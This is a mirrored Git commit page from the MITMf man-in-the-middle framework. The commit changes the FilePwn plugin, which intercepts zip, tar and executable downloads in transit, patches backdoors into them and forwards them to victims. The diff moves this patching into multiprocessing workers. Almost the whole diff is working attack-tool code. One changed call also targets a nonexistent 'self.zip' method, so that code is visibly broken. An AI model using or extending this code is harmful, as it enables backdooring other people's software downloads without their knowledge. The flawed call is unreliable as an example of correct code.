mirror of
https://github.com/byt3bl33d3r/MITMf.git
synced 2025-07-07 05:22:15 -07:00
Filepwn plugin now uses multiprocessing to patch binaries
This commit is contained in:
byt3bl33d3r
parent
3e835c3a28
commit
df9fd2d12a
1 changed files with 42 additions and 13 deletions
|
|
@ -65,6 +65,8 @@ import shutil
|
||||||
import random
|
import random
|
||||||
import string
|
import string
|
||||||
import tarfile
|
import tarfile
|
||||||
|
import multiprocessing
|
||||||
|
|
||||||
from libs.bdfactory import pebin
|
from libs.bdfactory import pebin
|
||||||
from libs.bdfactory import elfbin
|
from libs.bdfactory import elfbin
|
||||||
from libs.bdfactory import machobin
|
from libs.bdfactory import machobin
|
||||||
|
|
@ -85,6 +87,8 @@ class FilePwn(Plugin):
|
||||||
'''Called if plugin is enabled, passed the options namespace'''
|
'''Called if plugin is enabled, passed the options namespace'''
|
||||||
self.options = options
|
self.options = options
|
||||||
|
|
||||||
|
self.patched = multiprocessing.Queue()
|
||||||
|
|
||||||
#FOR FUTURE USE
|
#FOR FUTURE USE
|
||||||
self.binaryMimeTypes = ["application/octet-stream", 'application/x-msdownload', 'application/x-msdos-program', 'binary/octet-stream']
|
self.binaryMimeTypes = ["application/octet-stream", 'application/x-msdownload', 'application/x-msdos-program', 'binary/octet-stream']
|
||||||
|
|
||||||
|
|
@ -282,7 +286,8 @@ class FilePwn(Plugin):
|
||||||
)
|
)
|
||||||
result = targetFile.run_this()
|
result = targetFile.run_this()
|
||||||
|
|
||||||
return result
|
self.patched.put(result)
|
||||||
|
return
|
||||||
|
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
print 'Exception', str(e)
|
print 'Exception', str(e)
|
||||||
|
|
@ -297,7 +302,8 @@ class FilePwn(Plugin):
|
||||||
if len(aTarFileBytes) > int(self.userConfig['TAR']['maxSize']):
|
if len(aTarFileBytes) > int(self.userConfig['TAR']['maxSize']):
|
||||||
print "[!] TarFile over allowed size"
|
print "[!] TarFile over allowed size"
|
||||||
logging.info("TarFIle maxSize met %s", len(aTarFileBytes))
|
logging.info("TarFIle maxSize met %s", len(aTarFileBytes))
|
||||||
return aTarFileBytes
|
self.patched.put(aTarFileBytes)
|
||||||
|
return
|
||||||
|
|
||||||
with tempfile.NamedTemporaryFile() as tarFileStorage:
|
with tempfile.NamedTemporaryFile() as tarFileStorage:
|
||||||
tarFileStorage.write(aTarFileBytes)
|
tarFileStorage.write(aTarFileBytes)
|
||||||
|
|
@ -305,7 +311,8 @@ class FilePwn(Plugin):
|
||||||
|
|
||||||
if not tarfile.is_tarfile(tarFileStorage.name):
|
if not tarfile.is_tarfile(tarFileStorage.name):
|
||||||
print '[!] Not a tar file'
|
print '[!] Not a tar file'
|
||||||
return aTarFileBytes
|
self.patched.put(aTarFileBytes)
|
||||||
|
return
|
||||||
|
|
||||||
compressionMode = ':'
|
compressionMode = ':'
|
||||||
if formatt == 'gz':
|
if formatt == 'gz':
|
||||||
|
|
@ -322,7 +329,8 @@ class FilePwn(Plugin):
|
||||||
|
|
||||||
if tarFile is None:
|
if tarFile is None:
|
||||||
print '[!] Not a tar file'
|
print '[!] Not a tar file'
|
||||||
return aTarFileBytes
|
self.patched.put(aTarFileBytes)
|
||||||
|
return
|
||||||
|
|
||||||
print '[*] Tar file contents and info:'
|
print '[*] Tar file contents and info:'
|
||||||
print '[*] Compression:', formatt
|
print '[*] Compression:', formatt
|
||||||
|
|
@ -408,9 +416,11 @@ class FilePwn(Plugin):
|
||||||
if wasPatched is False:
|
if wasPatched is False:
|
||||||
# If nothing was changed return the original
|
# If nothing was changed return the original
|
||||||
print "[*] No files were patched forwarding original file"
|
print "[*] No files were patched forwarding original file"
|
||||||
return aTarFileBytes
|
self.patched.put(aTarFileBytes)
|
||||||
|
return
|
||||||
else:
|
else:
|
||||||
return ret
|
self.patched.put(ret)
|
||||||
|
return
|
||||||
|
|
||||||
def zip_files(self, aZipFile):
|
def zip_files(self, aZipFile):
|
||||||
"When called will unpack and edit a Zip File and return a zip file"
|
"When called will unpack and edit a Zip File and return a zip file"
|
||||||
|
|
@ -420,7 +430,8 @@ class FilePwn(Plugin):
|
||||||
if len(aZipFile) > int(self.userConfig['ZIP']['maxSize']):
|
if len(aZipFile) > int(self.userConfig['ZIP']['maxSize']):
|
||||||
print "[!] ZipFile over allowed size"
|
print "[!] ZipFile over allowed size"
|
||||||
logging.info("ZipFIle maxSize met %s", len(aZipFile))
|
logging.info("ZipFIle maxSize met %s", len(aZipFile))
|
||||||
return aZipFile
|
self.patched.put(aZipFile)
|
||||||
|
return
|
||||||
|
|
||||||
tmpRan = ''.join(random.choice(string.ascii_lowercase + string.digits + string.ascii_uppercase) for _ in range(8))
|
tmpRan = ''.join(random.choice(string.ascii_lowercase + string.digits + string.ascii_uppercase) for _ in range(8))
|
||||||
tmpDir = '/tmp/' + tmpRan
|
tmpDir = '/tmp/' + tmpRan
|
||||||
|
|
@ -520,9 +531,11 @@ class FilePwn(Plugin):
|
||||||
|
|
||||||
if wasPatched is False:
|
if wasPatched is False:
|
||||||
print "[*] No files were patched forwarding original file"
|
print "[*] No files were patched forwarding original file"
|
||||||
return aZipFile
|
self.patched.put(aZipFile)
|
||||||
|
return
|
||||||
else:
|
else:
|
||||||
return tempZipFile
|
self.patched.put(tempZipFile)
|
||||||
|
return
|
||||||
|
|
||||||
def handleResponse(self, request, data):
|
def handleResponse(self, request, data):
|
||||||
|
|
||||||
|
|
@ -533,7 +546,13 @@ class FilePwn(Plugin):
|
||||||
|
|
||||||
if self.bytes_have_format(data, 'zip'):
|
if self.bytes_have_format(data, 'zip'):
|
||||||
logging.info("%s Detected supported zip file type!" % client_ip)
|
logging.info("%s Detected supported zip file type!" % client_ip)
|
||||||
bd_zip = self.zip_files(data)
|
|
||||||
|
process = multiprocessing.Process(target=self.zip, args=(data,))
|
||||||
|
process.daemon = True
|
||||||
|
process.start()
|
||||||
|
process.join()
|
||||||
|
bd_zip = self.patched.get()
|
||||||
|
|
||||||
if bd_zip:
|
if bd_zip:
|
||||||
logging.info("%s Patching complete, forwarding to client" % client_ip)
|
logging.info("%s Patching complete, forwarding to client" % client_ip)
|
||||||
return {'request': request, 'data': bd_zip}
|
return {'request': request, 'data': bd_zip}
|
||||||
|
|
@ -542,7 +561,13 @@ class FilePwn(Plugin):
|
||||||
for tartype in ['gz','bz','tar']:
|
for tartype in ['gz','bz','tar']:
|
||||||
if self.bytes_have_format(data, tartype):
|
if self.bytes_have_format(data, tartype):
|
||||||
logging.info("%s Detected supported tar file type!" % client_ip)
|
logging.info("%s Detected supported tar file type!" % client_ip)
|
||||||
bd_tar = self.tar_files(data)
|
|
||||||
|
process = multiprocessing.Process(target=self.tar_files, args=(data,))
|
||||||
|
process.daemon = True
|
||||||
|
process.start()
|
||||||
|
process.join()
|
||||||
|
bd_tar = self.patched.get()
|
||||||
|
|
||||||
if bd_tar:
|
if bd_tar:
|
||||||
logging.info("%s Patching complete, forwarding to client" % client_ip)
|
logging.info("%s Patching complete, forwarding to client" % client_ip)
|
||||||
return {'request': request, 'data': bd_tar}
|
return {'request': request, 'data': bd_tar}
|
||||||
|
|
@ -556,7 +581,11 @@ class FilePwn(Plugin):
|
||||||
with open(tmpFile, 'w') as f:
|
with open(tmpFile, 'w') as f:
|
||||||
f.write(data)
|
f.write(data)
|
||||||
|
|
||||||
patchb = self.binaryGrinder(tmpFile)
|
process = multiprocessing.Process(name='binaryGrinder', target=self.binaryGrinder, args=(tmpFile,))
|
||||||
|
process.daemon = True
|
||||||
|
process.start()
|
||||||
|
process.join()
|
||||||
|
patchb = self.patched.get()
|
||||||
|
|
||||||
if patchb:
|
if patchb:
|
||||||
bd_binary = open("backdoored/" + os.path.basename(tmpFile), "rb").read()
|
bd_binary = open("backdoored/" + os.path.basename(tmpFile), "rb").read()
|
||||||
|
|
|
||||||
Loading…
Add table
Add a link
Reference in a new issue